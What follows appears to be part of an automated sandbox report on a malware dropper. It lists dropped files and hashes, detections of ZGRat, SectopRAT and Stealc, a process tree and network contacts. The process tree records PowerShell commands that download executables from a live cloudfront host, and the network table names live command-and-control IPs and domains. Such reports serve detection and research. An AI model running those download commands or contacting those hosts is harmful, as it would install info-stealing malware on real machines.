| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar2295.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | cdff232ba5f19245cb3051dbe343475b |
| SHA1 | 48c9413b74bde37f3bf74dd0f807bbf21b019bba |
| SHA256 | 9d6f08844e37d68931921fa518a4bf2af370d581d15a79609f463facfe768ab0 |
| SHA512 | dd03485119dbe18414ccaf9185759e7a6f1c9d942753a573900797c2d74c77c53608ac51773c0d4d4de02d41e2ea357900e703521431a80b48993696d8cd7ea9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 52176d063dcdb67592736cd7a6edec07 |
| SHA1 | de9775a58899fb218fc38981f5b082b7e8e5f5fc |
| SHA256 | 9fb136831780e33c6a600022072fca50448ac1e123224294213dade48489624a |
| SHA512 | c8c56484277122d003044522b28cde8a9c7cd183e4ee4618db8cb1491bfcd6f05e0cf8abe73ef0c5678e2e67a327059dbe4490659b76de15e509a40eec7c1372 |
C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat
| MD5 | c03b3682569c40524152ba0ea7bc25ff |
| SHA1 | 670c137c03ade8b573e4084c12dcb1d00e377c20 |
| SHA256 | 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f |
| SHA512 | 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a |
memory/1072-168-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/1072-169-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/1072-172-0x0000000002AF0000-0x0000000002B30000-memory.dmp
memory/1072-171-0x0000000002AF0000-0x0000000002B30000-memory.dmp
memory/1072-170-0x0000000002AF0000-0x0000000002B30000-memory.dmp
memory/1072-173-0x0000000073C50000-0x00000000741FB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | ac1b1bc5a0cadb408afba338d153f087 |
| SHA1 | c7e6145baa89ea358d5bc9456570645d0193a833 |
| SHA256 | ea37e030af3674aeaa393a3cbc8a8a3e1b2b564e28bf00c644f84e010cc86e3f |
| SHA512 | 7f2d9b03d2ab2ee3c8ec89ad07dfc237737e24195c67f42b9c71e5cdebe1d71e0162ddf0372bbc48352320f73fed61b86d7339f8cef4b0668fe57f23d8c609fe |
memory/476-179-0x00000000736A0000-0x0000000073C4B000-memory.dmp
memory/476-180-0x0000000002D20000-0x0000000002D60000-memory.dmp
memory/476-181-0x00000000736A0000-0x0000000073C4B000-memory.dmp
memory/476-183-0x00000000736A0000-0x0000000073C4B000-memory.dmp
\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | ae73eb4cbe39e4a9e28a367331329a12 |
| SHA1 | fa827d6b4f9c94dd137fc24b201259a4c8293913 |
| SHA256 | 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e |
| SHA512 | b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500 |
memory/1860-188-0x0000000004200000-0x0000000004300000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1860-190-0x0000000000230000-0x000000000029D000-memory.dmp
memory/352-196-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/352-197-0x0000000001FF0000-0x0000000002030000-memory.dmp
memory/352-198-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/352-199-0x0000000001FF0000-0x0000000002030000-memory.dmp
memory/352-200-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/2668-211-0x0000000002440000-0x0000000002441000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1fo.0.exe
| MD5 | 80e0fece33768e20034d106db0d36341 |
| SHA1 | ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510 |
| SHA256 | 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e |
| SHA512 | 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f |
memory/1172-232-0x0000000004480000-0x0000000004580000-memory.dmp
memory/1172-233-0x0000000000220000-0x0000000000247000-memory.dmp
memory/1172-234-0x0000000000400000-0x000000000403C000-memory.dmp
memory/1688-243-0x00000000736A0000-0x0000000073C4B000-memory.dmp
memory/1688-244-0x0000000002A10000-0x0000000002A50000-memory.dmp
memory/1688-245-0x00000000736A0000-0x0000000073C4B000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fa5db95986bb9c7001ae113d70b3ae47 |
| SHA1 | 589674e9127078d5ebbb8223ffb32ed66e422c1b |
| SHA256 | 0218489b7290909764e3cd262440af40bc99c56528bbc27d7f47ae9d7b0e576e |
| SHA512 | 49c3978137f41572a288806e209f8f806c296f11aba181accd2667a79e6c132d0277f2fcd08fa6047258958f927eee1262e5cbadfc372199bcd3b29d9325af78 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8a122a410326772e8f82875b217ebb1f |
| SHA1 | 7444ffdb59b0df6eba061740b6ae3d0bafaa3a4e |
| SHA256 | bb3d7f0e516db8a5248e39e7aee3bc898736d6b3a7d9f02d7ce7af5d75c401b6 |
| SHA512 | cb8731b4f10c71780da9043c204b8f83850c961ed065cb51fbcf5c5d6821d55335d446d2feee2e7bdf3206f8964835412aac808c6397b54a77f683fcc2b2344d |
memory/1860-321-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1688-322-0x00000000736A0000-0x0000000073C4B000-memory.dmp
memory/1860-342-0x0000000004200000-0x0000000004300000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\U1FO1~1.ZIP
| MD5 | 78d3ca6355c93c72b494bb6a498bf639 |
| SHA1 | 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e |
| SHA256 | a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001 |
| SHA512 | 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea |
\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Users\Admin\AppData\Local\Temp\u1fo.2\relay.dll
| MD5 | 10d51becd0bbce0fab147ff9658c565e |
| SHA1 | 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a |
| SHA256 | 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed |
| SHA512 | 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29 |
C:\Users\Admin\AppData\Local\Temp\u1fo.2\whale.dbf
| MD5 | a723bf46048e0bfb15b8d77d7a648c3e |
| SHA1 | 8952d3c34e9341e4425571e10f22b782695bb915 |
| SHA256 | b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422 |
| SHA512 | ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273 |
C:\Users\Admin\AppData\Local\Temp\u1fo.2\bunch.dat
| MD5 | 1e8237d3028ab52821d69099e0954f97 |
| SHA1 | 30a6ae353adda0c471c6ed5b7a2458b07185abf2 |
| SHA256 | 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742 |
| SHA512 | a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3 |
memory/2036-432-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/2036-433-0x0000000077C10000-0x0000000077DB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1fo.2\UIxMarketPlugin.dll
| MD5 | d1ba9412e78bfc98074c5d724a1a87d6 |
| SHA1 | 0572f98d78fb0b366b5a086c2a74cc68b771d368 |
| SHA256 | cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15 |
| SHA512 | 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f |
memory/2036-439-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/1860-440-0x0000000000400000-0x000000000405F000-memory.dmp
memory/2036-441-0x00000000747C0000-0x0000000074934000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4e41388c
| MD5 | a3f64b0f4425cccfbe71b41931a1a3f4 |
| SHA1 | 2fb9d9470c2e1052c226fcf2f2c06e7f35e3105c |
| SHA256 | 8d9a9385fc6af4cbba1ec2c2f07986200c88d5b038519ab08d234f48e2901ec3 |
| SHA512 | 070a370f78fd432edc20f9bdb096f9522f716713b2d08e38389518043b4705f665aa7be34caedf8feaf8a475e1454bf8f4acb6c8f0ce90e3d793b248b9467d3a |
memory/636-443-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/636-445-0x0000000077C10000-0x0000000077DB9000-memory.dmp
memory/636-492-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/636-493-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/636-497-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/2380-498-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2380-495-0x0000000073190000-0x00000000741F2000-memory.dmp
memory/2380-499-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2380-500-0x0000000000400000-0x00000000004C6000-memory.dmp
memory/2380-501-0x0000000072AA0000-0x000000007318E000-memory.dmp
memory/2380-502-0x0000000004CD0000-0x0000000004D10000-memory.dmp
memory/2380-505-0x0000000072AA0000-0x000000007318E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e82ed9131ad46b9025ff978fef4abd59 |
| SHA1 | 8c68caa63d85144b4ff660e3a7b48f8865dd17e9 |
| SHA256 | ccb90805ec961324e7f29e4a1fce8649f757d7e69dbaf4a99b0b9fbbecb64473 |
| SHA512 | af55eedfaf9a2cbe1f6438881ba1553b8267574d49768fcd9ee5ff0a2a1cc828f023f681af62746ac66a16fa28416a3f93239e1bae9861cb1d00681d6bea1270 |
memory/2380-526-0x0000000004CD0000-0x0000000004D10000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1fo.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/1860-544-0x0000000004200000-0x0000000004300000-memory.dmp
memory/1860-543-0x0000000000400000-0x000000000405F000-memory.dmp
memory/2464-545-0x0000000000230000-0x0000000000231000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | b7b3e8a8a18b027b4333feba64524a0a |
| SHA1 | b55d040f683077b446c098bc87e320cde0d82a7a |
| SHA256 | 4877aaefb31817035e386aaa6d0550e4cd0a1a331f694dd0ffbb32a106389f34 |
| SHA512 | 1c7358c1aab01eb891b078ac3d796600009fe0c47c7315a68b064af29bd2d82e1093f8829b23a0ee968ccad558916d2c74f77bfd2cc34149ef25f8ea75c0b561 |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 3668218f4409c4ca5543d108ed16ed29 |
| SHA1 | 88670b8be52cc341c721dd62b7ad36333fd37c5f |
| SHA256 | a1f26152bdb5109ebac832e81c6a1491edec58dfea5af7bf5cc2942b5119a985 |
| SHA512 | 05606270baa6655418df48f28b139a24be9caaf6ff5ed69e47f4431669064e895a3297a8a67b24650adfc750ad37d7567241dabe268352615fe21f678e4b612b |
memory/2464-580-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/812-582-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp
memory/812-583-0x0000000001070000-0x0000000004968000-memory.dmp
memory/812-584-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-585-0x000000001ED20000-0x000000001EE30000-memory.dmp
memory/812-586-0x00000000007C0000-0x00000000007D0000-memory.dmp
memory/812-587-0x0000000000A80000-0x0000000000A8C000-memory.dmp
memory/812-588-0x00000000007D0000-0x00000000007E4000-memory.dmp
memory/812-589-0x0000000000CE0000-0x0000000000D04000-memory.dmp
memory/812-590-0x0000000001060000-0x000000000106A000-memory.dmp
memory/812-591-0x000000001E530000-0x000000001E55A000-memory.dmp
memory/812-592-0x000000001F710000-0x000000001F7C2000-memory.dmp
memory/812-593-0x0000000000B10000-0x0000000000B8A000-memory.dmp
memory/812-594-0x0000000000E90000-0x0000000000EF2000-memory.dmp
memory/812-595-0x0000000000560000-0x000000000056A000-memory.dmp
memory/812-599-0x000000001FDD0000-0x00000000200D0000-memory.dmp
memory/812-601-0x0000000000580000-0x000000000058A000-memory.dmp
memory/812-602-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-603-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-604-0x0000000000CC0000-0x0000000000CCA000-memory.dmp
memory/812-605-0x000000001E5B0000-0x000000001E5D2000-memory.dmp
memory/812-609-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-608-0x0000000000CD0000-0x0000000000CDC000-memory.dmp
memory/812-613-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp
memory/812-614-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-616-0x0000000000580000-0x000000000058A000-memory.dmp
memory/812-615-0x0000000000580000-0x000000000058A000-memory.dmp
memory/812-617-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-618-0x000000001EB20000-0x000000001EBA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\a156d2ee87eeb3012aacff4fcc5518f7fa0b2caa0b97ad5a5e46c2e4fdf8c5f4\53c051f1d10c489198d14bef4e290887.tmp
| MD5 | 9810559e8ca9cb1e9e1a5222797b7def |
| SHA1 | 0f244940a3f4df18b02a9064f264c8e203cbf885 |
| SHA256 | 7d64187cf73ba0fbf6b691c8dca9f7eb52b557c7da23ecb96f5823189e389955 |
| SHA512 | dda14e433941d72ce88765066159ceb053a7da92ace08dd35dbd9d3ccefda4b9a651c8f42483689e2c49ede3499eb0d8d24f8d60f16675ea0694bb98a3e93ea1 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealc
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3652 set thread context of 4836 | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4836 set thread context of 4984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\i1.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\load.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=28381000 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5024 -ip 5024
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 1016
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
"C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 532
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.61.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.15.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.41.65.18.in-addr.arpa | udp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 210.61.156.108.in-addr.arpa | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | 240216234727901.mjj.xne26.cfd | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| BG | 94.156.35.76:80 | 240216234727901.mjj.xne26.cfd | tcp |
| US | 8.8.8.8:53 | 153.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| US | 8.8.8.8:53 | 76.35.156.94.in-addr.arpa | udp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| US | 8.8.8.8:53 | 76.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.76.97.176.in-addr.arpa | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
